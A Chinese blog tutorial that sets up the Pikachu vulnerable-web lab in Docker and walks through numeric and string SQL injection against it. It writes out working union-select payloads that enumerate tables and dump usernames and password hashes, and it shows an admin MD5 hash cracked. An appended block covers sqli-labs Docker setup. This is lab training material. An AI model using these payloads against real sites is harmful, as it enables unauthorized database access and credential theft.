Docker搭建pikachu靶场以及SQL-Inject中的数字型与字符型注入

  • docker安装pikachu(参考文章

    1. 拉取资源到本地:

      docker pull area39/pikachu
      
    2. 启动pikachu靶场,将容器命名为pikachu,映射web访问端口为9002,mysql数据库端口映射为23306:

      docker run --name pikachu -d -p 9002:80 -p 23306:3306 area39/pikachu
      

    要映射两个端口,不然会启动后会打不开靶场

    1. 访问pikachu,进行系统初始化(首次打开要初始化靶场中的数据库),访问http://ip:9002进性初始化,之后点击“点击这里”就可以进入靶场了。在这里插入图片描述

      在这里插入图片描述

  • pikachu靶场中的SQL-Inject练习

    1. 数字型注入

      选择查询值1,并使用BurpSuite抓包 在这里插入图片描述

      在这里插入图片描述
      可以看到提交的内容id=1&submit=%E6%9F%A5%E8%AF%A2,将其发送到Repeater并在id=
      构造绕过语句id=1'&submit=%E6%9F%A5%E8%AF%A2,看到报错回显得出数据库为MySQL;
      在这里插入图片描述
      构造绕过语句id=1"&submit=%E6%9F%A5%E8%AF%A2,继续报错;
      构造绕过语句id=1 and 1=1&submit=%E6%9F%A5%E8%AF%A2,回显id=1的查询界面;
      构造绕过语句id=1 and 1=2&submit=%E6%9F%A5%E8%AF%A2,回显所查询id不存在,为整型注入;
      开始查询:

      1. 获取列数:
        id=1 order by 2&submit=%E6%9F%A5%E8%AF%A2
      2. 查数据库名:
        id=1 union select database(),version()&submit=%E6%9F%A5%E8%AF%,得到数据库名pikachu
      3. 查表名:
        id=1 union select group_concat(table_name),1 from information_schema.tables where table_schema=database()&submit=%E6%9F%A5%E8%AF%,得到表名httpinfo, member, message, users, xssblind
      4. 查列名:
        id=1 union select group_concat(column_name),1 from information_schema.columns where table_name='users'&submit=%E6%9F%A5%E8%AF%,得到字段名USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS, id, username, password, level
      5. 查数据:
        id=1 union select username,password from pikachu.users&submit=%E6%9F%A5%E8%AF%,得到admin以及加密过的密码e10adc3949ba59abbe56e057f20f883e,丢到在线MD5解密网站得到admin明文密码123456
        在这里插入图片描述
    2. 字符型注入

      参数直接拼接在URL中:
      在这里插入图片描述 构造?name=vince'&submit=%E6%9F%A5%E8%AF%A2,有报错; 在这里插入图片描述
      构造?name=vince' '&submit=%E6%9F%A5%E8%AF%A2,正常回显查询结果,所以可以用单引号闭合语句;
      构造?name=vince'#&submit=%E6%9F%A5%E8%AF%A2,为空回显,不能用#注释,需要换一种注释方式;
      构造?name=vince' -- &submit=%E6%9F%A5%E8%AF%A2,正常回显查询结果,所以可以用-- 来注释;

      1. 接着就是一样的查列数:
        构造?name=vince' order by 2-- &submit=%E6%9F%A5%E8%AF%A2,列数为2;
      2. 查数据库名和版本号:
        构造?name=vince' union select database(),version()-- &submit=%E6%9F%A5%E8%AF%A2
        在这里插入图片描述
      3. 查表名:
        构造?name=vince' union select group_concat(table_name),1 from information_schema.tables where table_schema=database()-- &submit=%E6%9F%A5%E8%AF%A2
        在这里插入图片描述
      4. 查列名:
        构造?name=vince' union select group_concat(column_name),1 from information_schema.columns where table_schema=database()-- &submit=%E6%9F%A5%E8%AF%A2
        在这里插入图片描述
      5. 查数据:
        构造?name=vince' union select username,password from pikachu.users-- &submit=%E6%9F%A5%E8%AF%A2
        在这里插入图片描述
要使用Docker搭建SQLi-LAB靶场,你可以按照以下步骤进行操作: 1. 首先,你需要安装Docker。你可以使用以下命令来安装所需的软件包: ``` yum install -y yum-utils device-mapper-persistent-data lvm2 yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo yum list docker-ce --showduplicates | sort -r yum install docker-ce ``` 2. 如果之前已经安装过Docker,你可能需要先卸载旧版本,然后再重新安装。你可以使用以下命令来卸载旧版本: ``` yum remove docker docker-common docker-selinux docker-engine ``` 3. 安装完成后,你可以使用以下命令来验证Docker是否成功安装: ``` docker version ``` 4. 接下来,你需要拉取SQLi-LAB的Docker镜像。你可以使用以下命令来搜索并拉取镜像: ``` docker search sqli-labs docker pull acgpiano/sqli-labs ``` 5. 拉取完成后,你可以使用以下命令来运行SQLi-LAB镜像: ``` docker run -dt --name sqli -p 8888:80 --rm acgpiano/sqli-labs ``` 通过以上步骤,你就可以使用Docker成功搭建SQLi-LAB靶场了。你可以通过访问`http://localhost:8888`来访问SQLi-LAB靶场。 #### 引用[.reference_title] - *1* *2* [[SQL靶场搭建]使用Docker搭建SQLi-LAB靶场](https://blog.csdn.net/m0_61155226/article/details/129833018)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [docker部署常见的SQL注入靶场](https://blog.csdn.net/qq_52109950/article/details/129169073)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值